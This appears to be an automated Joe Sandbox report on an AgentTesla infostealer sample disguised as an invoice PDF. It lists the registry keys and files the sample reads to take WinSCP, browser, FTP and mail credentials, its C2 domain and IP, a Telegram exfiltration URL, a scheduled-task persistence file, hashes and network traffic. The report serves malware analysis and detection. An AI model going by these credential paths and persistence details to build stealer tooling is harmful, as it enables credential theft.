Source: Yara match	File source: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.473614554.0000000002CCE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.474100533.0000000002DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6744, type: MEMORY
Source: Yara match	File source: Process Memory Space: Proforma Invoice with Bank Details_pdf.exe PID: 6672, type: MEMORY
Source: Yara match	File source: 0.2.Proforma Invoice with Bank Details_pdf.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 6744, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000003.00000002.473024653.0000000002C01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.473614554.0000000002CCE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.474100533.0000000002DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6744, type: MEMORY
Source: Yara match	File source: Process Memory Space: Proforma Invoice with Bank Details_pdf.exe PID: 6672, type: MEMORY
Source: Yara match	File source: 0.2.Proforma Invoice with Bank Details_pdf.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Scheduled Task/Job1	Process Injection212	Disable or Modify Tools1	OS Credential Dumping2	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Deobfuscate/Decode Files or Information11	Credentials in Registry1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter2	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	System Information Discovery135	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Logon Script (Mac)	Software Packing11	NTDS	Security Software Discovery141	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion13	LSA Secrets	Virtualization/Sandbox Evasion13	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection212	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
Proforma Invoice with Bank Details_pdf.exe	31%	Virustotal	Browse
Proforma Invoice with Bank Details_pdf.exe	27%	ReversingLabs
Proforma Invoice with Bank Details_pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\folder\file.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

Source	Detection	Scanner	Label	Link
hybridgroupco.com	0%	Virustotal		Browse
mail.hybridgroupco.com	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:	0%	Virustotal		Browse
http://127.0.0.1:	0%	Avira URL Cloud	safe
http://AAETsHFcmz5EiUda3E.net	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
http://AAETsHFcmz5EiUda3E.net0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hybridgroupco.com	66.70.204.222	true	true	0%, Virustotal, Browse	unknown
mail.hybridgroupco.com	unknown	unknown	true	10%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:	Proforma Invoice with Bank Details_pdf.exe, Proforma Invoice with Bank Details_pdf.exe, 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp, MSBuild.exe, 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://AAETsHFcmz5EiUda3E.net	MSBuild.exe, 00000003.00000002.474100533.0000000002DA4000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/	Proforma Invoice with Bank Details_pdf.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	Proforma Invoice with Bank Details_pdf.exe, 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp, MSBuild.exe, 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://AAETsHFcmz5EiUda3E.net0	MSBuild.exe, 00000003.00000002.473614554.0000000002CCE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot%telegramapi%/	Proforma Invoice with Bank Details_pdf.exe, Proforma Invoice with Bank Details_pdf.exe, 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp, MSBuild.exe, 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	Proforma Invoice with Bank Details_pdf.exe, MSBuild.exe, 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
66.70.204.222	unknown	Canada		16276	OVHFR	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	323892
Start date:	27.11.2020
Start time:	18:48:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Proforma Invoice with Bank Details_pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 76.1% (good quality ratio 71.3%) Quality average: 81.5% Quality standard deviation: 29.2%
HCA Information:	Successful, ratio: 82% Number of executed functions: 101 Number of non-executed functions: 34
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.42.151.234, 51.104.139.180, 104.80.23.128, 20.54.26.129, 2.20.142.210, 2.20.142.209, 92.122.213.247, 92.122.213.194, 13.88.21.125, 51.104.144.132 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:49:14	API Interceptor	895x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
66.70.204.222	Image001.exe	Get hash	malicious	Browse
	4nfg3g3nwg.exe	Get hash	malicious	Browse
	DOC04121993.exe	Get hash	malicious	Browse
	PI.exe	Get hash	malicious	Browse
	d9f83622ec1564600202a937d2414af8.exe	Get hash	malicious	Browse
	Image001.exe	Get hash	malicious	Browse
	mEPbT6Dbzc.exe	Get hash	malicious	Browse
	b32sUgpVdT.exe	Get hash	malicious	Browse
	ZXeB2BO1Lq.exe	Get hash	malicious	Browse
	kiGANMAmR3.exe	Get hash	malicious	Browse
	QM34U1x8I6.exe	Get hash	malicious	Browse
	Y2UrKCOaJm.exe	Get hash	malicious	Browse
	SJAOO8OCe3.exe	Get hash	malicious	Browse
	zh7966Pn0I.exe	Get hash	malicious	Browse
	o7B4zT1WNb.exe	Get hash	malicious	Browse
	emMAbUc8Xg.exe	Get hash	malicious	Browse
	a2onj1GOHs.exe	Get hash	malicious	Browse
	RDp6VoVSfQ.exe	Get hash	malicious	Browse
	DUE_INVOICE.exe	Get hash	malicious	Browse
	2M3ZdRze7b.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	Direct Deposit.xlsx	Get hash	malicious	Browse	145.239.131.51
	Direct Deposit.xlsx	Get hash	malicious	Browse	145.239.131.55
	https://mincast.us-south.cf.appdomain.cloud/redirect/?email=prampon@soteb.fr	Get hash	malicious	Browse	149.56.20.211
	Image001.exe	Get hash	malicious	Browse	66.70.204.222
	4nfg3g3nwg.exe	Get hash	malicious	Browse	66.70.204.222
	due-invoice.xlsm	Get hash	malicious	Browse	87.98.154.146
	SHIPPING DOCUMENT & PACKING LIST.exe	Get hash	malicious	Browse	51.75.130.83
	anthon.exe	Get hash	malicious	Browse	51.38.230.18
	ORDER-207044.xLs.exe	Get hash	malicious	Browse	54.37.36.116
	Bulk Order - 1017C.exe	Get hash	malicious	Browse	51.75.130.83
	SWIFT Transfer (103) W071323.exe	Get hash	malicious	Browse	51.75.130.83
	http://ancien-site-joomla.fr/build2.exe	Get hash	malicious	Browse	87.98.154.146
	tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.js	Get hash	malicious	Browse	51.77.152.34
	tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.js	Get hash	malicious	Browse	51.77.152.34
	Invoice_Payment Form_948792.xlsm	Get hash	malicious	Browse	213.186.33.40
	0151-83872-976-67-83872.htm	Get hash	malicious	Browse	51.210.112.129
	SR7UzD8vSg.exe	Get hash	malicious	Browse	92.222.121.127
	PAYMENT ADVISE.exe	Get hash	malicious	Browse	51.75.130.83
	https://eti-salat.com/x/	Get hash	malicious	Browse	145.239.6.126
	index.html	Get hash	malicious	Browse	139.99.124.57

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml Download File
Process:	C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1287
Entropy (8bit):	5.224351566085788
Encrypted:	false
SSDEEP:	24:2do4+S8TcqdqMhrKOgFwvaPIrovlgU3ODOiIQRvh7hwZgvw43aVdyL3Tbn:c+XBqMhGeaPIrovl33ODOiLdKZgfoILv
MD5:	4E45BCEC6ED11BB2765703CA8CA4A469
SHA1:	2D2060D24EAA8352FB02AD6106E782CE62E195D1
SHA-256:	381A73DEBD630FB0411220156217C871B931452D7915FE81EF73091A8B9A5214
SHA-512:	3A9DC709E42584ACAF300EB9D0985EE39CABDF06A8327A8475417A54277DCCF66AF127185374117335A11280C7C5A0281D87F708379582DF03944DB0C3ED4488
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version = "1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.<RegistrationInfo>.<Date>2015-09-27T14:27:44.8929027</Date > .<Author>142233\user</Author>.</RegistrationInfo>.<Triggers>.<LogonTrigger>.<Enabled>true</Enabled>.<UserId>142233\user</UserId>.</LogonTrigger>.<RegistrationTrigger>.<Enabled>false</Enabled>.</RegistrationTrigger>.</Triggers>.<Principals>.<Principal id="Author">.<UserId>142233\user</UserId>.<LogonType>InteractiveToken</LogonType>.<RunLevel>LeastPrivilege</RunLevel>.</Principal>.</Principals>.<Settings>.<MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.<AllowHardTerminate>false</AllowHardTerminate>.<StartWhenAvailable>true</StartWhenAvailable>.<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.<IdleSettings>.<StopOnIdleEnd>true</StopOnIdleEnd>.<RestartOnIdle>false</RestartOnIdle>.</IdleSettings>.<AllowStartOnDemand>true</AllowStartOnDemand>.<Enabled>true</Enabled>.<Hidden>fals

C:\Users\user\AppData\Local\Temp\folder\file.exe Download File
Process:	C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	626186
Entropy (8bit):	7.525138445631881
Encrypted:	false
SSDEEP:	12288:SrRqJJ1rAfoG1WFn4LJ6zuTlq3v9+s9tlgGKwE:QRq1rAsGEzwq3v9+s9tLi
MD5:	029A3195D923405E8017102F90346E1E
SHA1:	EB670BBD759C268B547E3397A0AED30C515CCF17
SHA-256:	6713DB52BAFE0DE00F0F03ED9A1618ABE5946105DAECF10938323E12CE41FA7F
SHA-512:	4FA94F113D0F75108709F33629B6EB3BCD517762BF14CF164F7D4D0E7A71DA96F7A62F3F44DD6D101BC83E763FA9CA4BEBD9C6066A87FF8CEF30B69D8AE17C5D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Km.Km.Km..>.Rm..<..m..=..m.Km..m..J.Xm.l. .Jm.l.:.Jm.Kmd.Jm.l.?.Jm.RichKm.........................PE..L...G.._.................b...X......?H............@.......................................@.................................h................................p...................................... ...@............................................text...9a.......b.................. ..`.rdata...c.......d...f..............@..@.data............h..................@....rsrc................2..............@..@.reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.5252045251493005
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Proforma Invoice with Bank Details_pdf.exe
File size:	626176
MD5:	8816ae2d440c50e7ec52be21ae6e2b22
SHA1:	210289b9df203f83f263fe2530aa28c078b8d6c1
SHA256:	d2146d63100b68c87046aa63c8e5b73a8893e171f24c3500070005ccea0eaacd
SHA512:	3f0f5c577025b60e219fcc64e20d1294ed74d3fd80006130e56d30f2fbacd80e7da112649e52892db6a977d25ae5a4be3f856176e226dc0f891a96deb044cc1a
SSDEEP:	12288:SrRqJJ1rAfoG1WFn4LJ6zuTlq3v9+s9tlgGKwE:QRq1rAsGEzwq3v9+s9tLi
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Km..Km..Km....>.Rm....<..m....=..m..Km...m....J.Xm..l. .Jm..l.:.Jm..Kmd.Jm..l.?.Jm..RichKm..........................PE..L..

File Icon


Icon Hash:	f0f06094c36ee8c2

Static PE Info

General
Entrypoint:	0x40483f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FC0D847 [Fri Nov 27 10:43:19 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	be74bcf76a56fe7a35a0a7f280acf926

Entrypoint Preview

Instruction
call 00007FD71CEDB463h
jmp 00007FD71CED3D3Ch
call 00007FD71CEDA0C7h
mov edx, eax
mov eax, dword ptr [edx+6Ch]
cmp eax, dword ptr [0041FC94h]
je 00007FD71CED3EC2h
mov ecx, dword ptr [0041FD54h]
test dword ptr [edx+70h], ecx
jne 00007FD71CED3EB7h
call 00007FD71CED9EACh
mov eax, dword ptr [eax+04h]
ret
call 00007FD71CEDA0A1h
mov edx, eax
mov eax, dword ptr [edx+6Ch]
cmp eax, dword ptr [0041FC94h]
je 00007FD71CED3EC2h
mov ecx, dword ptr [0041FD54h]
test dword ptr [edx+70h], ecx
jne 00007FD71CED3EB7h
call 00007FD71CED9E86h
add eax, 000000A0h
ret
push ebp
mov ebp, esp
sub esp, 44h
mov eax, dword ptr [0041F9B8h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]
mov dword ptr [ebp-2Ch], ebx
mov eax, dword ptr [esi+000000A8h]
mov dword ptr [ebp-20h], ebx
mov dword ptr [ebp-24h], ebx
mov dword ptr [ebp-1Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-44h], esi
mov dword ptr [ebp-40h], ebx
test eax, eax
je 00007FD71CED41C2h
push edi
lea edi, dword ptr [esi+04h]
cmp dword ptr [edi], ebx
jne 00007FD71CED3ECEh
push edi
push 00001004h
push eax
lea eax, dword ptr [ebp-44h]
push ebx
push eax
call 00007FD71CEDA928h
add esp, 14h
test eax, eax
jne 00007FD71CED416Ah
push 00000004h
call 00007FD71CED7295h
push 00000002h
push 00000180h
mov dword ptr [ebp-2Ch], eax

Rich Headers

Programming Language:

[RES] VS2012 build 50727
[LNK] VS2012 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d868	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0xd4b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x97000	0x1484	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1c520	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x18000	0x204	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16139	0x16200	False	0.572232521186	data	6.66933993297	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x18000	0x63ba	0x6400	False	0.3630859375	data	4.86039745717	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x69684	0x66800	False	0.987345179116	data	7.98736576468	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0xd4b0	0xd600	False	0.080917786215	data	3.628789833	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x97000	0x8594	0x8600	False	0.125670475746	data	1.56501104284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x890f0	0xd228	data	English	United States
RT_GROUP_ICON	0x96318	0x14	data	English	United States
RT_MANIFEST	0x96330	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	HeapReAlloc, EnumSystemLocalesEx, IsValidLocaleName, LCMapStringEx, GetUserDefaultLocaleName, GetModuleHandleW, TerminateProcess, GetCurrentProcess, LoadLibraryExW, FlsSetValue, FlsGetValue, FlsAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, SetFilePointerEx, ReadFile, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CloseHandle, GetOEMCP, GetACP, IsValidCodePage, FreeEnvironmentStringsW, OutputDebugStringW, LoadLibraryW, SetStdHandle, WriteConsoleW, ReadConsoleW, CreateFileW, VirtualProtect, FlsFree, GetEnvironmentStringsW, GetTickCount64, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetStartupInfoW, InitOnceExecuteOnce, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, Sleep, GetLocaleInfoEx, MultiByteToWideChar, GetStringTypeW, GetLastError, HeapFree, GetCommandLineA, GetCPInfo, RaiseException, RtlUnwind, HeapAlloc, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, IsDebuggerPresent, GetProcessHeap, SetLastError, GetCurrentThreadId, ExitProcess, GetModuleHandleExW, GetProcAddress, HeapSize, GetStdHandle, WriteFile, GetModuleFileNameW, GetFileType
MSWSOCK.dll	s_perror, rexec, rcmd, GetNameByTypeW, EnumProtocolsW, dn_expand
SETUPAPI.dll	SetupQueryInfFileInformationW, SetupGetInfFileListA, SetupQueueDeleteA
MPR.dll	MultinetGetConnectionPerformanceA, WNetConnectionDialog1A, WNetGetResourceParentA, MultinetGetConnectionPerformanceW, WNetGetUserW
WINMM.dll	timeEndPeriod, timeKillEvent, mmioFlush, midiStreamOut, joySetCapture, midiInStart
pdh.dll	PdhVbGetCounterPathElements, PdhRemoveCounter, PdhEnumObjectItemsW, PdhOpenQueryA, PdhVbIsGoodStatus, PdhGetLogFileSize
msi.dll
GDI32.dll	SetMagicColors, EnumFontFamiliesExW, CreateRectRgn, RemoveFontMemResourceEx, EudcUnloadLinkW, CreateCompatibleBitmap, CreateFontIndirectA, ScaleViewportExtEx, CreatePatternBrush, CreateICW
MAPI32.dll

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 18:49:16.637509108 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.637701035 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.683197975 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.683275938 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.808008909 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.808058023 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.808098078 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.808145046 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.808186054 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.808206081 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.822509050 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.822563887 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.822581053 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.822616100 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.822652102 CET	443	49679	13.83.66.189	192.168.2.3
